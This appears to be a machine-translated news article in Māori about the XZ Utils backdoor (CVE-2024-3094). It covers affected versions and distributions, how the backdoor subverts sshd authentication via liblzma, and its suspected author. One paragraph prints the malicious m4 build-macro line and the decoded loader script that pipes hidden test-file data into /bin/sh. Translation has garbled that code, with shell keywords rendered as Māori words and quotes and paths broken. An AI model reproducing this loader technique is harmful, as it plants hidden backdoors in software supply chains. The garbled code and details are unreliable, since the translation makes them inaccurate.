I roto i te kete XZ Utils, kei roto te whare pukapuka liblzma me nga taputapu mo te mahi me nga raraunga kapi i te whakatakotoranga ".xz", kua kitea he kuaha o muri (CVE-2024-3094) e taea ai te haukoti me te whakarereketanga o nga raraunga ka tukatukahia e nga tono e pa ana. me te whare pukapuka liblzma. Ko te whainga matua o te kuaha o muri ko te OpenSSH server, i etahi o nga tohatoha ka honoa ki te whare pukapuka libsystemd, ka whakamahia te liblzma. Ko te hono i te sshd me te whare pukapuka whakaraerae ka taea e nga kaiwhaiwhai te uru atu ki te tūmau SSH me te kore he motuhēhēnga.
Ko te backdoor kei roto i nga putanga mana 5.6.0 me 5.6.1, i whakaputaina i te Hui-tanguru 24 me Maehe 9, i kaha ki te uru ki etahi tohatoha me nga putunga, hei tauira, Gentoo, Arch Linux, Debian sid / unstable, Fedora Rawhide me 40-beta, wheketere openSUSE me te tumbleweed, LibreELEC, Alpine edge, Solus, NixOS unstable, OpenIndiana, OpenMandriva rolling, pkgsrc current, Slackware current, Manjaro testing. Ko nga kaiwhakamahi katoa o nga putanga xz 5.6.0 me te 5.6.1 e taunaki ana kia huri wawe ki te putanga 5.4.6.
I roto i nga mea e whakaiti ana i te raru, ka taea te tohu ko te putanga o te liblzma me te tuara kaore i uru ki roto i nga putanga pumau o nga tohatoha nui, engari i pa ki a OpenSUSE Tumbleweed me Fedora 40-beta. I whakamahia e Arch Linux me Gentoo tetahi putanga whakaraerae o te zx, engari kaore i te kaha ki te whakaeke na te mea kaore ratou i te tono i te papaki systemd-notify ki openssh, e hono ai te sshd ki te liblzma. Ko te tuara anake ka pa ki nga punaha x86_64 i runga i te kernel Linux me te whare pukapuka Glibc C.
I hunahia te waehere whakahohenga o muri ki roto i nga tonotono m4 mai i te konae hanga-ki-host.m4 e whakamahia ana e te kete taputapu automake i te wa e hanga ana. I te wa o te huihuinga, i te wa e mahia ana nga mahi whakaraerae i runga i nga purongo (bad-3-corrupt_lzma2.xz, good-large_compressed.lzma), i whakamahia hei whakamatautau i te tika o te mahi, i hangaia he konae ahanoa me te waehere kino, i whakauruhia ki roto. te whare pukapuka liblzma me te whakarereke i te arorau mahi etahi o ana mahi. I whakauruhia nga tonotono m4 whakahoahoa-muri ki roto i nga tarballs tuku, engari kaore i roto i te rokiroki Git. I te wa ano, ko nga kohinga whakamatautau kino kei roto i te rehitatanga, i.e. Ko te tangata nana i whakatinana i te kuaha o muri i whai waahi ki te putunga me nga tikanga whakaputa whakaputa.
I te wa e whakamahi ana i te liblzma i roto i nga tono, ka taea te whakamahi i nga huringa kino ki te haukoti, ki te whakarereke i nga raraunga, ki te pa ranei ki te mahi a sshd. Ina koa, na te waehere kino i whakapohehe i te mahi RSA_public_decrypt ki te karo i te tukanga whakamotuhēhēnga sshd. Ko te kuaha o muri ko te whakamarumaru mai i te kitenga a kaore i kitea i te wa i whakaritea nga taurangi taiao LANG me TERM (arā, i te wa e whakahaere ana i te tukanga i roto i te tauranga) me nga taurangi taiao LD_DEBUG me LD_PROFILE kaore i whakaritea, ka whakahohehia i te wa e mahia ana te mahi. /usr/sbin/sshd kōnae whakahaere. He huarahi ano te tatau o muri ki te kimi mahi i roto i nga taiao patuiro.
Ina koa, i whakamahia e te kōnae m4/build-to-host.m4 gl_am_configmake=`grep -aErls “#{4}[[:alnum:]]{5}#{4}$” $srcdir/ 2>/dev / null` … gl_[$1]_config='sed \»r\n\» $gl_am_configmake | eval $gl_path_map | $gl_[$1]_muamua -d 2>/dev/null'
I te hanganga tuatahi, i kitea e te mahinga grep nga whakamatautau kōnae/files/bad-3-corrupt_lzma2.xz, i te wa i wetewetehia ai, i hangaia te tuhinga: ####Hello#### #345U211267$^D330^W [ ! $(uname) = "Linux" ] && puta 0 [ ! $(uname) = "Linux" ] && puta 0 [ ! $(uname) = "Linux" ] && puta 0 [ ! $(uname) = "Linux" ] && puta 0 [ ! $(uname) = "Linux" ] && puta 0 eval `grep ^srcdir= config.status` ki te whakamatautau -f ../../config.status; katahi ka eval `grep ^srcdir= ../../config .status` srcdir="../../$srcdir» fi kaweake i=»((head -c +1024 >/dev/null) && upoko -c +2048 && (head -c +1024 >/dev/ null) && upoko -c +2048 && (upoko -c +1024 >/dev/null) && upoko -c +2048 && (upoko -c +1024 >/dev/null) && upoko -c +2048 && (upoko - c +1024 >/dev/null) && upoko -c +2048 && (head -c +1024 >/dev/null) && upoko -c +2048 && (head -c +1024 >/dev/null) && upoko - c +2048 && (head -c +1024 >/dev/null) && upoko -c +2048 && (head -c +1024 >>dev/null) && upoko -c +2048 && (head -c +1024 >/ dev/null) && upoko -c +2048 && (upoko -c +1024 >/dev/null) && upoko -c +2048 && (upoko -c +1024 >/dev/null) && upoko -c +2048 && ( upoko -c +1024 >/dev/null) && upoko -c +2048 && (head -c +1024 >>dev/null) && upoko -c +2048 && (head -c +1024 >/dev/null) && upoko -c +2048 && (upoko -c +1024 >/dev/null) && upoko -c +2048 && (upoko -c +1024 >/dev/null) && upoko -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13 \50-\113" "\0-\377")|xz -F raw —lzma1 -dc|/bin/sh ####Ao####
Ko te pehea i taea ai e nga kaiwhaiwhai te uru atu ki nga hanganga o te kaupapa xz kaore ano kia tino marama. Kaore ano kia marama te maha o nga kaiwhakamahi me nga kaupapa i whakararu i te hua o te kuaha o muri. Ko te kaituhi i whakapaehia o te backdoor (JiaT75 - Jia Tan), nana i tuku nga purongo me te waehere kino i roto i te whare putunga, i korero ki nga kaihanga Fedora me te tuku tono kume ki a Debian e pa ana ki te whakawhiti o nga tohatoha ki te peka xz 5.6.0, a kaore i pai. whakaohohia te whakapae, i te mea i uru atu ia ki te xz kei te whanake mo nga tau e rua kua hori, a ko ia te kaiwhakawhanake tuarua mo te maha o nga huringa i mahia. I tua atu i te kaupapa xz, ko te kaituhi i whakapaehia o te backdoor i uru ano ki te whakawhanaketanga o nga kohinga xz-java me te xz-whakauru. I tua atu, ko Jia Tan i etahi ra i mua i whakauruhia ki te maha o nga kaitiaki o te kaupapa XZ Embedded i whakamahia i roto i te kernel Linux.
I kitea te huringa kino i muri i te tātari i te nui o te kai PTM me nga hapa i puta mai i te valgrind i te wa e hono ana ma te ssh ki nga punaha-a-papa-a-Debian. Ko te mea nui ko te tukunga xz 5.6.1 ko nga huringa i whakaritea e te kaituhi e kiia ana o te backdoor hei whakautu mo nga amuamu mo te sshd puhoi me nga tukinga i puta ake i muri i te whakahou ki te putanga zx 5.6.0 me te backdoor. I tua atu, i tera tau i huri a Jia Tan i nga huringa karekau e hototahi ki te aratau tirotiro "-fsanitize=address", na reira i monoa ai i te wa e whakamatautauria ana.
Source: opennet.ru